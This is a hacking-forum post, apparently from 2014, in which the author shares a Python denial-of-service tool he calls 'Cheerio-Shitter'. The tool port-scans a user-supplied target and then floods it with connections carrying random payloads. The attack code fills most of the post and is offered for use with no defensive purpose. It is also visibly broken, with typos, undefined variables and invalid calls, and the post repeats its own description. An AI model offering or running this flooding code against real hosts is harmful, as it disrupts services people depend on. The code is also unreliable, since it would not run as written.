The Cheerio-Shitter 03-06-2014, 07:44 AM
#1
Basically this is a DDoS tool that I made. It utilizes my password generator code, a port scanner and DDoS tool.
Run down:
Scans ports 1 - 100, if no open port is found, it defaults to port 80.
Makes a message with a random length ranging between 50 and 500 digits of random characters.
Sends a random amount of packets(50 - 500) to the target.
I call it the Cheerio-Shitter because this is the last(probably), most powerful DDoS tool I've ever made. Assuming it works that is.
This is a night thread for me, basically I don't have much time to tell too much details. Hope you like the cheerio-shitter.
Run down:
Scans ports 1 - 100, if no open port is found, it defaults to port 80.
Makes a message with a random length ranging between 50 and 500 digits of random characters.
Sends a random amount of packets(50 - 500) to the target.
I call it the Cheerio-Shitter because this is the last(probably), most powerful DDoS tool I've ever made. Assuming it works that is.
Code:
#Cheerio-Shitter DDoS Tool, programmed by Duubz
import os,sys,time,socket,string,random
target_req = input("Target: ")
target = socket.gethostbyname(target_req)
openports = []
def portscan(address,port):
x = socket.socket()
try:
x.connect((target,port))
print("{0}".format(port))
openports[1:1] = [port]
return True
except socket.error:
return False
x.close()
for port in range(1,100):
portscan(target,port)
print("Open Ports: {0}".format(openports))
if port in openports > 0:
port_choice = random.choice(openports)
else:
port_choice = '80'
randompack_length = random.randint(50,500)
randompack_chars = string.ascii_letts + string.digits + '~!@#$%^&*()_+'
random.seed = (os.urandom(1024))
randompack = " ".join(random.choice(randompack_chars) for i in range(length)).replace(" ","")
randinst = random.randint(50,500)
port = port_choice
packet = randompack
instances = randinst
def dos():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
x.connect((target,port))
x.send(packet)
x.sendto(packet(target,port))
x.send(packet);
except socket.error:
print("Socket error, failed to launch.")
x.close()
for i in range(1,instances):
dos()This is a night thread for me, basically I don't have much time to tell too much details. Hope you like the cheerio-shitter.
![[Image: BXqGARG.png]](https://i.imgur.com/BXqGARG.png)








![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)












![[Image: R5aCcWV.png]](http://i.imgur.com/R5aCcWV.png)
![[Image: jWSyE88.png]](http://i.imgur.com/jWSyE88.png)




